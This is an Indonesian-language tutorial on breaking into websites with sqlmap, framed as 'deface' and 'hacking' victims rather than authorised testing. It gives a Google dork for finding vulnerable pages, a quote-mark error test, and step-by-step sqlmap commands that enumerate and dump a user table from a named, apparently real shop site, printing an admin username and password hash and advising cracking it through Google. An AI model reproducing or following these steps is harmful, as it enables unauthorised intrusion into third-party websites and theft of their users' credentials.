SQL Injection With sqlmap On Windows 7 Tutorial

Bismillahirahmanirahim

Kali ini gua share ya, cara deface pake Sqlmap.  

Apasih Sqlmap?

Open source pentest tools buat penetration web yang lemah terhadap SQL Injection. kok sama kaya havij? iya sama, cuma kalo sqlmap dia lebih tajem daripada havij. jadi yang ga bisa di eksekusi di havij bisa di coba di Sqlmap.

Apa aja yang dibutuhin?

Python (Harus yang versi 2.7 kebawah. cari aja di google. kalo versi 3 ke atas ga bisa buat hek hekan)

Sqlmap (Search aja di gugel   )

Cara Nyari korbannya gimana?

sama kaya nyari korban sql injection biasa. nih dork dari gua :)

inurl:/*.php?id=23 site:com

inurl itu berarti url nya.

site itu berarti domain yang di inginkan.

oke tanpa basa basi kita mulai aja ya

Untuk mengetahui website yang kalian mau Inject itu Vuln atau tidak , silahkan kasih tanda ( ' ) atau (-) atau (%) di akhir  url target, contoh : 

• http://vana-shop.com/product.php?c=1' , nah kalo vuln nanti ada tulisan "you have an erro ...." mysql error dan sebagainya"

sekarang waktunya di hajar kalo udah ketemu web yang vuln :P

 

1. Setelah instal python, sekarang kalian extrack SQLMAPnya di Drive C:, setelah di extrack buka CMD lalu ketikan :

• cd\sqlmap\ , maka hasilnya akan seperti ini :

 

 

2. Stelah itu, kalian mulailah scan website target dengan contoh perintah :

 

• sqlmap.py -u http://www.WEBTARGET.../file.php?id=22 --dbs

Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs , klik [ENTER]

 

 

3. Tuh kan keliatan DATABASE nya :D , sekarang waktunya kita scan dengan perintah :

 

• sqlmap.py -u http://TARGET.com -D nama_database -tables

Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables , maka hasilnya akan seperti ini :

 

 

4. Nah keliatan kan Table di databasenya ? nah sekarang kita scan table tersebut (*cari yang menurut kalian terdapat info tentang user dan pass website) kalo udah yakin disana ada infonya, ketikan perintah :

 

• sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns

Contoh Target : sqlmap.py -u http://www.vana-shop...product.php?c=1 -D k4735093_vnsh099 -T user --columns , tekan enter maka hasilnya akan seperti ini :

 

 

5. Nah setelah keliatan Tabelnya sekarang kita ketikan perintah :

 

• sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump

Contoh Target : sqlmap.py -u http://www.vana-shop...product.php?c=1 -D k4735093_vnsh099 -T user --dump , klik enter 

 

 Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip" :

 

• do you want to crack them via a dictionary-based attack? [Y/n/q] 

Maka Hasilnya akan seperti ini :

 

 

 

nah itu kita dapetin User + Passwordnya :D

User : admin

Pass : dfc560ef836a9a63c2bdbfb24a683624

 

cara untuk decrypt passwordnya gimana?

pake havij aja, pilih feature md5 nya. kalo gagal juga, copy md5 passwordnya, paste di searchbox nya google. InsyaAllah nanti muncul kalo lu beruntung  

 

Refrensi: indocyberarmy.blogspot.com